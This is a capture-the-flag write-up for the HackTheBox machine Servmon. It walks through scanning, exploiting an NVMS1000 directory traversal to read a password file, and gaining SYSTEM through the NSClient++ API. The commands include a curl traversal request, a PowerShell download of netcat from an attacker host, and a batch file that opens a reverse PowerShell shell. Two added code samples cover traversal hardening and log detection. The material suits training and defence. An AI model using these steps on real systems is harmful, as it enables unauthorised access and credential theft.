Hackthebox – Servmon

As with any box, Servmon also gets some port scans.

root@kalivm:~/Servmon# nmap -oN fullscan-A -A 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 09:24 CEST
Nmap scan report for 10.10.10.184 (10.10.10.184)
Host is up (0.081s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     refox/68.0
|_    ":{"context":"ini://${shared-
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-30T07:30:33
|_  start_date: N/A

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   13.19 ms  10.10.14.1 (10.10.14.1)
2   428.93 ms 10.10.10.184 (10.10.10.184)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.16 seconds

So the interesting ports are 21 (anonymous FTP), 22 (SSH on a Windows box?!), 80 (the web server, obviously) and 8443, which also looks interesting, though I have no clue yet what it is. Let's first start with the FTP server.

root@kalivm:~/Servmon# ncftp 10.10.10.184
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.184...                                                                                                          
Microsoft FTP Service
Logging in...                                                                                                                          
User logged in.
Logged in to 10.10.10.184.                                                                                                             
ncftp / > dir 
d---------   1 ftpuser  ftpusers            0 Jan 18 12:05 Users
ncftp / > dir Users
d---------   1 ftpuser  ftpusers            0 Jan 18 12:06 Nadine
d---------   1 ftpuser  ftpusers            0 Jan 18 12:08 Nathan
ncftp / > dir Users/Nadine
----------   1 ftpuser  ftpusers          174 Jan 18 12:08 Confidential.txt
ncftp / > dir Users/Nathan
----------   1 ftpuser  ftpusers          186 Jan 18 12:10 Notes to do.txt

So the server contains a Users directory with folders for Nathan and Nadine, and both directories contain one .txt file.

root@kalivm:~/Servmon# cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Not too interesting: apparently Nathan has changed the password for NVMS and locked down NSClient access. Let's take a look at the Confidential file.

root@kalivm:~/Servmon# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Ok, so there is a Passwords.txt file on Nathan’s desktop… not yet sure what I can do with that, but good to keep in mind. Let's look further.
[Screenshot: NVMS1000 on Servmon]
The web server hosts NVMS1000.

root@kalivm:~/Servmon# searchsploit nvms 1000
----------------------------------- ---------------------------------
 Exploit Title                     |  Path
----------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal    | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal| hardware/webapps/48311.py
----------------------------------- ---------------------------------

A quick search on searchsploit shows that NVMS may be vulnerable to path traversal. This may be interesting to combine with that Passwords.txt file, since Nathan’s note said he had not yet uploaded the passwords or placed the secret files in SharePoint!

root@kalivm:~/Servmon# curl --path-as-is http://10.10.10.184/../../../Users/Nathan/Desktop/Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

And there we have some passwords we can now try out! After using Metasploit’s smb_login scanner to see if there were any valid credentials, it appeared that L1k3B1gBut7s@W0rk is Nadine’s password, but that did not get me much further on the fileshares since there were none. However, there are more services to try it on.
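To make the traversal above concrete from the defender's side, here is an added example (not code from the writeup or from NVMS1000) that resolves a request path the traversal-prone way next to a hardened resolver that pins the result inside the web root; the web root and the request are constructed, the request being the one used above.

```python
import posixpath
from pathlib import PurePosixPath
from urllib.parse import unquote

# Constructed web root for the example; NVMS1000's real install path is not
# on the page and does not matter for the logic.
WEB_ROOT = PurePosixPath("/srv/nvms/www")


def resolve_naive(web_root, request_path):
    """Traversal-prone resolution: glue the request path onto the web root and
    let path normalisation collapse the '..' segments, wherever they lead."""
    joined = posixpath.join(str(web_root), request_path.lstrip("/"))
    return PurePosixPath(posixpath.normpath(joined))


def resolve_safe(web_root, request_path):
    """Hardened resolution: percent-decode, treat backslashes as separators
    (Windows accepts both), normalise, then refuse anything that does not
    land on or inside the web root. Returns None for an escaping request."""
    decoded = unquote(request_path).replace("\\", "/")
    joined = posixpath.normpath(posixpath.join(str(web_root), decoded.lstrip("/")))
    candidate = PurePosixPath(joined)
    if candidate != web_root and web_root not in candidate.parents:
        return None
    return candidate


# The request used in the writeup: three '..' steps climb out of the web root.
TRAVERSAL = "/../../../Users/Nathan/Desktop/Passwords.txt"

if __name__ == "__main__":
    print("naive :", resolve_naive(WEB_ROOT, TRAVERSAL))   # escapes the web root
    print("safe  :", resolve_safe(WEB_ROOT, TRAVERSAL))    # None: rejected
```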

root@kalivm:~/Servmon# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON c:\Users\Nadine>type Desktop\user.txt
17c689b81<NOFLAG>50a358e02cc96ce

The password worked for the SSH connection too and there we have the flag!

Privilege Escalation

But we’re no Administrator yet, so it's time for privilege escalation. After some looking around, I found that there's an NSClient++ tool installed. It did not work all that well in Firefox, so I started Chromium to check it and it kind of worked.
[Screenshot: NSClient++ on Servmon]
However, I did not yet have a password, but I did find this exploit on Exploit-DB describing how to get it using the command line, which was also mentioned in the UI under ‘forget password’.

nadine@SERVMON C:\Users\Nadine>cd "c:\Program Files\NSClient++"

nadine@SERVMON c:\Program Files\NSClient++>type nsclient.ini
----snip----
; Undocumented key                                                                                                                     
password = ew2x6SsGTxjRwXOT                                                                                                            
                                                                                                                                       
; Undocumented key                                                                                                                     
allowed hosts = 127.0.0.1
----snip----

Wait, so the allowed hosts setting is limited to 127.0.0.1; that must be the access lockdown Nathan mentioned in his to-do file. It means I need a tunnel to that machine, so let's restart the SSH connection with a port forward.

root@kalivm:~/Servmon# ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd "c:\Program Files\NSClient++"
nadine@SERVMON c:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

After using the password display command, it showed the same password, so that must be it. After logging into the web UI, I could not really get it to work the way I wanted and got stuck for a while. After asking on Discord for a little nudge, someone told me to go through the API instead, and after reading some of the API documentation, that appeared to be easy. So I downloaded netcat to Servmon and prepared a batch file locally.

nadine@SERVMON C:\Users\Nadine>powershell IWR -uri http://10.10.15.30:8000/windows/nc.exe -outfile c:\Temp\nc.exe

root@kalivm:~/Servmon# cat sedje.bat 
@echo off 
c:\Temp\nc.exe 10.10.15.30 9000 -e powershell
root@kalivm:~/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/sedje.bat --data-binary @sedje.bat
Enter host password for user 'admin':
Added sedje as scripts

I added the script and then had to start a listener and restart the service. After browsing to the Queries screen in the web interface, the connection came in.

root@kalivm:~/~# nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.184 50975
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\NSClient++>whoami
whoami
nt authority\system

And there I have a shell as nt authority\system. Now all that is left is to get the flag.
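The script upload above is the kind of API write a defender would want to see in a log review. The following is an added example (not part of the writeup and not NSClient++ code) that scans constructed request lines in a simple "client method path status" layout for writes to the scripts API and notes when the client is loopback, since an allowed-hosts setting of 127.0.0.1 does not stop a local user or an SSH-forwarded port.

```python
import re
from ipaddress import ip_address

# Constructed sample lines, not real NSClient++ log output. The PUT line
# mirrors the script upload performed in the writeup.
SAMPLE_LOG = """\
10.10.14.9 GET /index.html 302
127.0.0.1 GET /api/v1/queries 200
127.0.0.1 PUT /api/v1/scripts/ext/scripts/sedje.bat 200
127.0.0.1 GET /api/v1/queries 200
"""

LINE_RE = re.compile(
    r"^(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$"
)
# Methods this detector treats as modifying the script tree (assumption for
# the example, not a statement about the NSClient++ API surface).
SCRIPT_WRITE_METHODS = {"PUT", "POST", "DELETE"}
SCRIPT_API_PREFIX = "/api/v1/scripts/"


def parse_line(line):
    """Split one constructed log line into its fields; None if it does not fit."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_script_writes(log_text):
    """Return one finding per request that writes under the scripts API.
    'via_loopback' is True when the request came from 127.0.0.1/::1, which is
    exactly what a tunnelled local connection looks like to the service."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] in SCRIPT_WRITE_METHODS and rec["path"].startswith(SCRIPT_API_PREFIX):
            findings.append({
                "client": rec["client"],
                "method": rec["method"],
                "script": rec["path"][len(SCRIPT_API_PREFIX):],
                "via_loopback": ip_address(rec["client"]).is_loopback,
            })
    return findings


if __name__ == "__main__":
    for finding in find_script_writes(SAMPLE_LOG):
        print(finding)
```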

PS C:\Program Files\NSClient++> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       30/05/2020     09:39             34 root.txt


PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c9fd74d2e<NOFLAG>28d140be18e8a97
